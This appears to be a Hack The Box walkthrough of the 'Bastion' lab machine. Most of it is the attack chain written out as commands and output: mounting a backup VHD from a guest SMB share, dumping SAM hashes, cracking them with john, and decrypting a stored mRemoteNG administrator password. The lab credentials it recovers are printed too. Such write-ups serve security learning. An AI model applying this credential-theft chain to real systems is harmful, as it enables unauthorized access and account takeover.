[HTB] Bastion(mount && guestmount, user cache data information disclosure)


The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor be responsible for any misuse or damage.

Service discovery

Let's quickly see which ports are open

└─# nmap -p- --open               
Nmap scan report for
Host is up (0.50s latency).
Not shown: 63143 closed ports, 2379 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

View the specified port information in detail

└─# nmap -Pn -sV -A -O -p 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 09:04 EST
Nmap scan report for
Host is up (0.58s latency).

22/tcp    open     tcpwrapped
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   filtered netbios-ssn
445/tcp   open     microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     unknown
49665/tcp open     unknown
49666/tcp open     unknown
49667/tcp open     unknown
49668/tcp open     unknown
49669/tcp open     unknown
49670/tcp open     unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m59s, deviation: 34m33s, median: -3s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-12-22T15:06:21+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-12-22T14:06:17
|_  start_date: 2021-12-22T13:37:56

TRACEROUTE (using port 135/tcp)
1   566.46 ms
2   565.05 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 181.76 seconds


See that the nmap scans that smb has a user guest, and use smbmap to view the shared directory information

└─#  smbmap -H -u guest
[+] IP:        Name:                                      
[-] Work[!] Unable to remove test directory at \\\Backups\YCUDSRXTPW, please remove manually
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Backups                                                 READ, WRITE
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC

Enter the Backups directory

└─# smbclient // -U guest
Enter WORKGROUP\guest's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Dec 22 10:47:38 2021
  ..                                  D        0  Wed Dec 22 10:47:38 2021
  CFZMBSIEGP                          D        0  Wed Dec 22 10:36:04 2021
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  TFHLPWIACJ                          D        0  Wed Dec 22 10:47:38 2021
  WindowsImageBackup                 Dn        0  Fri Feb 22 07:44:02 2019
  YCUDSRXTPW                          D        0  Wed Dec 22 10:44:00 2021

note.txt content

└─# cat note.txt                                    

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

The entire file backup should refer to the windows imagebackup folder

mount and guestmount

There are two vhd files. After checking, it is Microsoft's virtual machine file format, which is equivalent to the hard disk of the virtual machine

\\Backups\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\

Mount remote files locally
mount -t cifs // /mnt/myshare -o user=,password=

Mount the vhd file under the remote shared folder on kali
guestmount -a '/mnt/myshare/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd' -m /dev/sda1 --ro /root/htb/Bastion/windows

Now entering / root/htb/Bastion/windows is equivalent to entering the backup windows system of the target

└─# ll                   
Total consumption 2096729
drwxrwxrwx 1 root root          0  2 June 22, 2019 '$Recycle.Bin'
-rwxrwxrwx 1 root root         24  6 October 2009  autoexec.bat
-rwxrwxrwx 1 root root         10  6 October 2009  config.sys
lrwxrwxrwx 2 root root         14  7 June 14, 2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx 1 root root 2147016704  2 June 22, 2019  pagefile.sys
drwxrwxrwx 1 root root          0  7 September 13, 2009  PerfLogs
drwxrwxrwx 1 root root       4096  7 June 14, 2009  ProgramData
drwxrwxrwx 1 root root       4096  4 November 2011 'Program Files'
drwxrwxrwx 1 root root          0  2 June 22, 2019  Recovery
drwxrwxrwx 1 root root       4096  2 June 22, 2019 'System Volume Information'
drwxrwxrwx 1 root root       4096  2 June 22, 2019  Users
drwxrwxrwx 1 root root      16384  2 June 22, 2019  Windows

samdump2 gets the sam hash

Now let's go to the / root/htb/Bastion/windows/Windows/System32/config directory

Use the samdump2 command to print out the hash information saved by sam in the system

└─# samdump2 SYSTEM SAM                                                                                                                                                                                                               127 ⨯
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Intercept L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9::: save to local hash Txt file

Using john to crack

└─# john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje     (L4mpje)
1g 0:00:00:00 DONE (2021-12-23 02:57) 1.176g/s 11053Kp/s 11053Kc/s 11053KC/s buresres..burdy1
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

Get a login Voucher: l4mpje: Bureau lampje

Initial shell

Log in to L4mpje's account Using ssh service

ssh L4mpje@

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                                                                                                                           
l4mpje@BASTION C:\Users\L4mpje>whoami                                                                                           

Right raising

An mremoting user data is found in the cache folder of L4mpje

Mremoting is a remote desktop tool, which may save the user's login information

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir                                                                                                                                                      
 Volume in drive C has no label.                                                                                                                                                                                  
 Volume Serial Number is 0CB3-C487                                                                                                                                                                                
 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG                                                                                                                                                           
22-02-2019  14:03    <DIR>          .                                                                                                                                                                             
22-02-2019  14:03    <DIR>          ..                                                                                                                                                                            
22-02-2019  14:03             6.316 confCons.xml                                                                                                                                                                  
22-02-2019  14:02             6.194 confCons.xml.20190222-1402277353.backup                                                                                                                                       
22-02-2019  14:02             6.206 confCons.xml.20190222-1402339071.backup                                                                                                                                       
22-02-2019  14:02             6.218 confCons.xml.20190222-1402379227.backup                                                                                                                                       
22-02-2019  14:02             6.231 confCons.xml.20190222-1403070644.backup                                                                                                                                       
22-02-2019  14:03             6.319 confCons.xml.20190222-1403100488.backup                                                                                                                                       
22-02-2019  14:03             6.318 confCons.xml.20190222-1403220026.backup                                                                                                                                       
22-02-2019  14:03             6.315 confCons.xml.20190222-1403261268.backup                                                                                                                                       
22-02-2019  14:03             6.316 confCons.xml.20190222-1403272831.backup                                                                                                                                       
22-02-2019  14:03             6.315 confCons.xml.20190222-1403433299.backup                                                                                                                                       
22-02-2019  14:03             6.316 confCons.xml.20190222-1403486580.backup                                                                                                                                       
22-02-2019  14:03                51 extApps.xml                                                                                                                                                                   
22-02-2019  14:03             5.217 mRemoteNG.log                                                                                                                                                                 
22-02-2019  14:03             2.245 pnlLayout.xml                                                                                                                                                                 
22-02-2019  14:01    <DIR>          Themes                                                                                                                                                                        
              14 File(s)         76.577 bytes                                                                                                                                                                     
               3 Dir(s)  11.305.373.696 bytes free  

Because ssh is installed on the target, we can download files from the target to kali with scp command

└─# scp l4mpje@ .                                                                                                                                                      1 ⨯
l4mpje@'s password: 

View conf XML file and find the hash password of the Administrator: aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

└─# cat confCons.xml                                    
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />

The password looks like bash64, but it's not. Search Google for mremoting decrypt to find this Mrremoting decrypt script


└─# python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2

Get the login password of the Administrator: thXLHM96BeKL0ER2

ssh login to get root txt

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

administrator@BASTION C:\Users\Administrator>whoami                                                                             

administrator@BASTION C:\Users\Administrator>cd Desktop                                                                         

administrator@BASTION C:\Users\Administrator\Desktop>dir                                                                        
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\Administrator\Desktop                                                                                    

23-02-2019  09:40    <DIR>          .                                                                                           
23-02-2019  09:40    <DIR>          ..                                                                                          
23-02-2019  09:07                32 root.txt                                                                                    
               1 File(s)             32 bytes                                                                                   
               2 Dir(s)  11.305.373.696 bytes free    


Because the target "mistakenly" puts the backup system files in the shared directory, we can read the sensitive files in the target backup system by using the mount and guestmount commands
The sam hash password of the target can be extracted by using the samdump2 command
After entering the system, because there is the cache configuration information of the remote desktop tool mremoting in the target cache folder / Users/L4mpje/AppData/Roaming, we cracked the password and raised the right to the administrator.

Keywords: penetration test

Added by Risingstar on Sun, 26 Dec 2021 10:31:08 +0200